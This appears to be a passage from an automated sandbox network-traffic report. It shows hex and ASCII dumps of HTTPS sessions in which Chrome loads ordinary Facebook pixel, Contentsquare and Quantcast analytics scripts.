                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC16384INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1491INData Raw: 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 2c 62 29 3a 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 29 7d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: .setPrototypeOf(a,b):a.__proto__=b)}f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbeventsModules=function(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsR
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC14893INData Raw: 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: entsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.p
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1500INData Raw: 66 62 63 6c 69 64 22 2c 22 65 62 70 5f 70 61 74 68 22 3a 22 63 6c 69 63 6b 49 44 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 61 65 6d 22 2c 22 71 75 65 72 79 22 3a 22 61 65 6d 22 2c 22 65 62 70 5f 70 61 74 68 22 3a 22 61 65 6d 22 7d 5d 7d 2c 22 65 6e 61 62 6c 65 46 62 63 50 61 72 61 6d 53 70 6c 69 74 22 3a 66 61 6c 73 65 7d 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67 69 6e 28 22 62 72 6f 77 73 65 72 70 72 6f 70 65 72 74 69 65 73 22 29 3b 0a 69 6e 73 74 61 6e 63 65 2e 6f 70 74 49 6e 28 22 31 30 34 30 37 37 33 34 32 35 39 36 31 36 36 32 22 2c 20 22 42 72 6f 77 73 65 72 50 72 6f 70 65 72 74 69 65 73 22 2c 20 74 72 75 65 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67 69 6e 28 22 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 29 3b 0a 69 6e 73 74 61 6e 63 65 2e 6f 70
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: fbclid","ebp_path":"clickID"},{"prefix":"aem","query":"aem","ebp_path":"aem"}]},"enableFbcParamSplit":false});fbq.loadPlugin("browserproperties");instance.optIn("1040773425961662", "BrowserProperties", true);fbq.loadPlugin("estruleengine");instance.op
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC405INData Raw: 31 32 33 38 37 2c 22 74 74 6c 49 6e 48 6f 75 72 22 3a 31 2c 22 72 74 63 50 6f 72 74 4e 75 6d 62 65 72 73 22 3a 5b 31 32 35 38 30 2c 31 32 35 38 31 2c 31 32 35 38 32 2c 31 32 35 38 33 2c 31 32 35 38 34 2c 31 32 35 38 35 5d 2c 22 65 6e 61 62 6c 65 57 65 62 52 54 43 22 3a 66 61 6c 73 65 7d 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67 69 6e 28 22 61 63 74 69 6f 6e 69 64 22 29 3b 0a 69 6e 73 74 61 6e 63 65 2e 6f 70 74 49 6e 28 22 31 30 34 30 37 37 33 34 32 35 39 36 31 36 36 32 22 2c 20 22 41 63 74 69 6f 6e 49 44 22 2c 20 74 72 75 65 29 3b 0a 63 6f 6e 66 69 67 2e 73 65 74 28 22 31 30 34 30 37 37 33 34 32 35 39 36 31 36 36 32 22 2c 20 22 67 61 74 69 6e 67 22 2c 20 7b 22 67 61 74 69 6e 67 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 12387,"ttlInHour":1,"rtcPortNumbers":[12580,12581,12582,12583,12584,12585],"enableWebRTC":false});fbq.loadPlugin("actionid");instance.optIn("1040773425961662", "ActionID", true);config.set("1040773425961662", "gating", {"gatings":[{"name":"content_type


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          99192.168.2.174992318.244.18.1124436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC363OUTGET /uxa/8bbf67c487693.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: t.contentsquare.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC687INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 127714
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 11 Nov 2024 20:28:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "d7b0f8e4446c8b2519ae2df84d5228fc"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=900
                                                                                                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 5034084c037ff19008ba7c2c0b849a4c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: HIqsSPXsKmcOLG_DkqVHDqIec0eoXKCHh6xSxG8UD_JL99qwV5VYOg==
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          age: 0
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC15697INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd f9 5e dc c8 d2 28 f8 ff 3c 05 e8 fa 70 a4 b6 28 03 de ba ab 5a e6 2b 43 d9 c6 66 6b 0a bc d1 34 23 aa 12 50 bb 90 b0 a4 c2 a6 a1 e6 37 cf 32 8f 36 4f 32 11 91 bb 94 aa c2 ed ee 33 df bd b7 cf 62 4a b9 46 66 46 46 46 44 46 44 5e c5 f9 dc 5a ff 78 6d 67 fb 45 74 e3 25 45 7f eb b9 d7 3e 8d 47 05 0b bd cb 3c fb 9d 0d ca 8d a1 d7 fe f1 d1 d3 e5 95 d0 2b ca b8 1c 17 5e 7b 39 f4 ce b3 a2 4c e3 0b 06 5f 87 9e 77 14 7a 83 3c 2b 8a f5 ec 22 4e d2 fd 3c 1e 7c 4a d2 33 af bd 64 a5 f7 21 6d c4 36 4e 73 a8 67 97 c9 d2 82 a5 e5 1e fb 3c 4e 72 36 a4 b4 78 34 ca be f4 c7 27 43 aa ca 3b bd 4a 8a a4 cc f2 b5 2c fb 94 b0 fd e4 82 65 e3 d2 6b 3f 7c b4 fc e4 d1 12 fd 07 40 8c 2f 2e 47 6c 2f 2e 19 d4 c0 84 9c 5d 8e e2 eb 3d 36 c8 f2 21 f4 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ^(<p(Z+Cfk4#P726O23bJFfFFFDFD^ZxmgEt%E>G<+^{9L_wz<+"N<|J3d!m6Nsg<Nr6x4'C;J,ek?|@/.Gl/.]=6!'
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC293INData Raw: b7 50 69 23 c3 db 7e 83 5b b5 61 7b ca 57 13 0c 48 d8 51 47 1d 5f a8 dc 13 cc 7f aa 16 87 82 dc 91 17 4f ce d5 3c 14 f5 c3 b8 fc 64 fc e5 50 8a d1 67 48 d5 7e de 30 45 84 a4 7e 75 a4 f6 00 1c 5b a2 46 89 f4 20 6a 93 26 61 8b 5c 62 4d 65 29 d8 11 df 0d 26 8f 1c dc a0 1b fa f6 ce fe 71 7f bf bb b7 df 5b e7 96 9d fa 1b 0e 44 28 b0 b3 db db 3e de d8 3e de dd db 79 89 92 02 d9 83 56 13 8d a2 2f ba 1b 9b d0 d6 8a 2c c5 bf 79 81 bd 5e 77 fd 03 45 75 a7 5f de c4 cf 00 6f 32 ad 2b 1a 37 6d 56 ce 49 98 3b 1d 3d 48 24 95 44 a6 98 09 c6 50 08 bc 03 c4 4b ba cd 04 e1 df 18 94 38 8f b2 e7 ac 0f 3b 77 28 88 9d 94 9e e5 81 b8 81 57 1c 67 f4 32 98 b0 be e0 61 15 a3 82 8d 4e c5 6f c9 98 8b f0 a4 d5 d8 24 22 ec b0 07 9c 33 67 a5 17 bd 69 d4 a5 14 88 64 07 70 b7 68 6a c5 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Pi#~[a{WHQG_O<dPgH~0E~u[F j&a\bMe)&q[D(>>yV/,y^wEu_o2+7mVI;=H$DPK8;w(Wg2aNo$"3gidphj(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC942INData Raw: 47 1d a1 7f 56 e0 71 8b 9c da 94 47 30 e9 b4 c4 9c 12 9d 8e 60 4f ed db 73 2e 8d 06 8c b5 f3 5d 6b 13 84 87 2b 47 93 09 bf 10 b1 b6 80 ab d5 aa 55 19 33 34 82 95 86 1d d4 03 7d c6 39 13 54 f2 e7 7b dc b8 62 83 51 3b 01 ee ba 30 42 67 19 c6 9d a6 25 4a d5 12 a5 ce 25 02 0a c6 55 ce 48 b2 0e 97 c2 95 30 7c 78 e4 5e 8d ea 8e 5d 75 4e 36 6f 89 d1 9c 8b f5 d1 ed cc ab 55 15 36 2e 77 39 17 56 a1 25 7e 57 56 3b 10 63 75 20 ba 69 e8 f4 43 2e 9e 75 c8 c5 77 3b e4 e2 6f 38 e4 68 30 72 5f d0 c4 c0 84 99 0e 44 06 a9 c0 78 d0 c6 8b ab e4 ad b2 27 b8 79 3f 0e 6f 04 bb 88 5c 75 70 14 c8 8d 45 7f 56 f4 f2 8a fd 75 f8 10 16 96 97 79 28 b7 67 c3 ae 70 9d a6 df 4b 2a 4a 85 87 a5 1b 0f f5 84 ac 02 a8 c6 24 b9 88 07 6a 5e 1a 08 87 46 b1 40 8d b2 23 fa 8c 56 3a f6 ec 08 35 86
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GVqG0`Os.]k+GU34}9T{bQ;0Bg%J%UH0|x^]uN6oU6.w9V%~WV;cu iC.uw;o8h0r_Dx'y?o\upEVuy(gpK*J$j^F@#V:5
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC16384INData Raw: 61 84 af 71 5d e3 35 48 67 56 17 a4 e3 1e 86 76 bb 5d 54 ac 57 60 ad 56 14 ca f7 ca 64 72 75 ba 03 a6 11 24 70 ce 05 19 da f0 4a 7d be a5 c8 17 8e 69 b5 15 f4 a3 f0 aa da 97 b8 3f e0 8b d6 37 61 bd 80 0f 71 e9 a0 5b ee f3 96 d5 bd 83 5f 63 41 35 a6 c9 a6 35 ae f5 ef 86 60 a8 76 08 2f 24 a4 d2 b8 4e 9b e5 70 24 af 5d d0 c3 c9 4a 4d d5 1f 1f b8 90 af 9d d8 c6 a8 fc 51 0f 7a 54 12 a7 67 d5 e0 01 d1 ae fe 2e 1c b7 e0 b7 ff 0c ab 1d 31 dd 35 ba ed 09 f9 6e d9 66 8c 81 f3 42 6e 08 28 48 8d dd cd 34 7f 86 86 44 68 e6 03 9c bf 30 99 0c e3 55 12 3d da 3e be 7b 8d ac d2 b2 94 af 1d 72 88 cf e7 22 8c f1 0e 9c ff e6 e9 f8 bf ce bf 83 8e e2 7f de 8a ab a9 17 18 27 84 f3 6e 9b da 3b eb b9 e1 06 f4 07 3f 8b 70 80 68 28 05 e7 1d 8b 2f fc 1b 8a 9d d3 36 09 54 da 7a 89 77
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: aq]5HgVv]TW`Vdru$pJ}i?7aq[_cA55`v/$Np$]JMQzTg.15nfBn(H4Dh0U=>{r"'n;?ph(/6Tzw
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC16384INData Raw: fe 60 ec a1 83 d2 fa 02 93 1d b2 b0 2f 96 32 36 8b c4 7d 67 33 a0 99 97 b5 13 9a 1a b1 4b 45 91 b4 07 c9 55 99 68 45 48 9d 2e a5 84 fa 12 d6 05 95 83 0d 96 08 aa 22 c0 7e 5a 11 58 db 64 7e ca bd 34 8a fb 78 f6 89 91 04 6c d2 f7 63 13 93 0e 63 d8 e8 78 4a 02 2b 6c 76 86 ad d4 81 e5 e8 e8 ad d4 ad 6d a5 ee 4c 5b 69 44 ea c9 fa 09 a9 1e 79 2c 04 ca e8 36 a1 0c 1f 12 98 04 05 16 77 a3 86 7b 20 f4 05 54 ab 99 f7 14 64 de c3 c8 bc e7 98 85 dd 58 86 53 19 ff 7d e7 f4 b6 c1 51 7e be c6 08 38 e7 8a 63 5e df 61 91 38 59 34 74 07 44 bf 8c 67 c0 77 ae f7 22 d3 94 06 36 81 57 16 b9 df eb 0d ab f8 10 7a cf 9b 32 53 02 90 dd 9f e8 73 b9 66 8b 6d 9b 13 cb 6b d2 34 e7 15 16 28 b8 d7 fc 61 2c 2c e2 61 2c 2d e4 e6 53 3d 31 60 bf b8 38 bc c7 2c 5b 41 55 02 50 3d 1c d9 b1 1c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: `/26}g3KEUhEH."~ZXd~4xlccxJ+lvmL[iDy,6w{ TdXS}Q~8c^a8Y4tDgw"6Wz2Ssfmk4(a,,a,-S=1`8,[AUP=
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC2048INData Raw: 10 90 f5 47 90 7c 5d 85 6e f9 d8 3a fc 79 bb c9 ff bd 9f 87 86 ff bb e1 fa 7f 09 08 6f 75 3b 0b e1 ff 40 90 7f 29 31 70 61 fb 4b e9 35 db f4 e5 bf 8a b3 15 a3 49 27 39 d5 20 f7 25 a7 32 02 e5 d8 b6 ed 17 59 cd b6 dd 5a dd 49 7e f1 36 8c 64 30 d5 a3 6c 12 c3 6c b2 e0 9d 01 60 97 1e 70 cf 32 9d 98 22 ad 11 2d d7 eb b4 bb 3e 44 6c b1 a3 c4 25 ab 3c d2 f7 78 57 91 e6 87 d8 b5 5d 40 ae 69 d6 0e 96 86 5f d0 0e 4f 58 1d b5 5b df c7 0e 4f 8e a7 94 18 fb f6 f3 a5 25 11 9a 6e 90 27 6b a5 90 43 34 2d 78 27 eb 21 3b ab 39 49 da 00 71 6a 53 d5 9f fc 1b a6 11 ab 4d 8a db 90 6b 36 d9 89 ce f0 b5 34 a3 00 2c 4d 23 48 85 34 a5 69 01 cd 65 c3 3d 39 04 4a 10 d6 6b 5e c5 87 bb cc 01 2f 89 66 81 b2 e2 41 08 6f 72 e4 14 e1 9a b9 a9 ad 25 a6 0c 14 91 7f 2c e2 56 55 54 11 16 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: G|]n:you;@)1paK5I'9 %2YZI~6d0ll`p2"->Dl%<xW]@i_OX[O%n'kC4-x'!;9IqjSMk64,M#H4ie=9Jk^/fAor%,VUTn
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC12792INData Raw: 7c 52 c6 1f cb f8 73 19 bf 9e 9c 71 1a 8d 8d 75 44 72 a2 66 69 b0 c2 a8 af f9 7e 23 94 94 c5 65 6b 23 4f d2 18 33 6a 16 f0 ef 4e 9e 00 a4 5a 5b 6b 47 c7 e7 3b fb fb bf 9d 1c 9c 6f ee ae 6d ef 9c 1f 6e be da 7c 97 3c 3d ed 3c f9 ba f6 e4 8f a5 27 3f 2d 9e 3f 39 0b 57 db ff ed e1 3f 5e 2c 3d fc c7 b3 ef 5f 2c 45 4f e3 49 8e d7 df 82 23 a7 38 6b 6f 94 7e f8 93 c8 ee 2f f2 e4 86 4f 4a 2f 2a f7 83 5b c0 0a b3 e9 2d 34 ab 3f 38 1c 98 09 93 d2 21 e1 70 4f 73 e4 8f bf 38 3f fe b1 45 62 f7 b5 ac b7 66 e5 95 a4 22 fc ee da c1 98 f6 94 40 1c df 99 f8 aa 69 c9 79 04 cc 2c 5a 99 84 20 e6 b4 0a 4c e2 09 8c ec 1c a6 ab c1 e6 75 27 1d 04 ed 60 7d 3d 30 ac c5 c7 2a c0 95 02 10 0f 73 6a 2c 50 9b 5e 18 cb c2 79 a6 13 b4 b8 30 63 9c d6 56 47 84 b7 72 cb 79 17 49 04 64 22 33
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: |RsquDrfi~#ek#O3jNZ[kG;omn|<=<'?-?9W?^,=_,EOI#8ko~/OJ/*[-4?8!pOs8?Ebf"@iy,Z Lu'`}=0*sj,P^y0cVGryId"3
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC3592INData Raw: 68 9b f7 c1 48 35 b7 93 79 bb c8 d6 ec a9 b4 83 78 eb 2b 91 f7 6d 9e 76 37 37 7e ac 13 5d 40 f2 d7 2c 27 1d 83 d3 fb d2 ed ea a9 6f df de 20 61 6b 6e 55 4f 7d cb 7e d4 fc ab d8 75 84 4f 1a 07 e3 e8 fb 5e 5f cb 85 11 bd df fa ae e9 ef cb 53 13 95 21 b2 b6 79 1a 9b cc 8e 93 ee d2 e3 9e 63 04 2d 06 a3 d9 85 4a c8 c3 5c 23 37 ae 0a bb 1f 4d 7b f4 5a c7 19 11 88 9f e1 c0 fb e5 71 e0 c3 e3 71 40 a5 d1 f5 8b ce 9c 2f f7 11 3f 98 b5 05 3d bf f3 2b fe d7 fb b5 0e 78 0c e2 1a 91 55 fb fe e4 13 22 5a f0 a6 25 32 13 a1 bb 56 ac 77 f7 ce e6 9c c8 5a 5a 88 4d 1f 7c b7 6c db e6 46 ce 5d c0 1e 85 51 da fc e6 21 93 6e 09 c3 c7 a3 21 94 8a 49 ea f2 6a 03 fd 64 25 87 70 f0 70 c4 6b 07 44 59 28 99 8c 56 ca d9 fe 3d 88 f9 71 6e 3e 11 1a 71 3e 16 a8 09 48 1a db 23 09 18 9b 90
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: hH5yx+mv77~]@,'o aknUO}~uO^_S!yc-J\#7M{Zqq@/?=+xU"Z%2VwZZM|lF]Q!n!Ijd%ppkDY(V=qn>q>H#
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC12792INData Raw: 73 d9 3d e8 1e 02 96 71 06 70 46 e1 3a 74 67 6a d3 e8 53 26 61 2a c7 81 b3 60 03 19 0d 91 67 47 69 c8 75 af 6c 3c 65 ec 01 ee 4f 38 4a 6a 1c fa b9 95 24 5f 81 1d 90 99 10 0d f0 c8 1b 42 b3 ec c9 cb e5 4f 25 34 5e 6a 6b 59 89 04 a0 b7 7c 16 4e 92 20 ca ef 59 cb b7 fc 09 5a 16 3f 45 2c 53 09 c7 d8 0d 4b 38 66 8b e1 98 99 9e ff 4b c0 91 d0 e5 ff 07 e4 7c 40 d6 66 e2 3c 0b 4d bb 8a 4a 4c 6f d3 44 fa 00 64 e5 e2 2a 0b d2 e8 2a 84 9d bd ab ea 9b 72 57 35 8a d6 49 03 7d ac 48 ea d6 20 e0 d0 45 11 eb 9d 50 b5 dd b1 e7 08 f2 c6 5b e5 07 44 87 0c 14 76 e3 8a 29 98 3e 06 cd f8 60 6f 01 29 2c 73 5e 6e 18 54 f1 4c 52 c5 d7 63 e9 0a 0d 63 cb 28 5a 86 bb c2 fe ae fc db 5d 89 e2 69 01 2f d0 fa cc 07 22 e6 70 67 e9 47 94 7d 03 65 7d 77 c5 c7 12 57 45 9e 03 62 f3 bf f8 66
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: s=qpF:tgjS&a*`gGiul<eO8Jj$_BO%4^jkY|N YZ?E,SK8fK|@f<MJLoDd**rW5I}H EP[Dv)>`o),s^nTLRcc(Z]i/"pgG}e}wWEbf
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC16384INData Raw: 62 38 60 4a de 43 83 22 a4 1e 2c 2a bb 5e 08 61 75 7a e7 7b 6c d6 13 f7 58 e0 8f 42 e1 dc 4e dc 63 93 de 5d ef b1 2d de 2a 6a 15 f7 c2 be ff 96 f1 8c 6a 50 13 66 d8 20 5b 4d 7a 24 b2 d9 23 77 c9 d2 b1 26 14 91 b8 05 ad a1 3a 34 8a 23 85 3f 5d 61 6c 64 0c 8e c7 3d f1 16 5d f0 16 1b 94 17 4f 52 4c bc ce 66 b7 b9 e5 09 47 a4 6a 1d 83 15 e4 bc 2b cb 59 d1 33 34 3f e0 70 50 f2 2a bb 88 b6 f7 cc 86 4c 9e 2f 0b 00 29 6a 7a b3 28 ac c6 96 35 0d e3 0a e8 2a 2b 6f ec 88 f4 f9 0a 23 2a 2d c1 4f 0e a9 6a 71 94 31 99 bb e2 83 a2 e0 26 d5 4f 67 8b 44 10 38 a3 00 02 ef fa ee 2a fc f9 cc 44 33 6f bd 21 c6 31 18 bb 3f 2e d1 cf 0e 3f fa f9 09 e2 d0 8d a7 c6 2f 55 35 b8 40 b1 fb 4d d3 70 07 0c 1b d1 98 0d 75 56 14 01 7d cb 19 24 d8 63 7c a1 8e 74 0e aa 6a 17 94 ab 27 a6 ea
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: b8`JC",*^auz{lXBNc]-*jjPf [Mz$#w&:4#?]ald=]ORLfGj+Y34?pP*L/)jz(5*+o#*-Ojq1&OgD8*D3o!1?.?/U5@MpuV}$c|tj'


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          100192.168.2.174992418.66.102.1214436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC368OUTGET /rules-p-de_F6qVUp9bug.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: rules.quantcount.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC668INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 9860
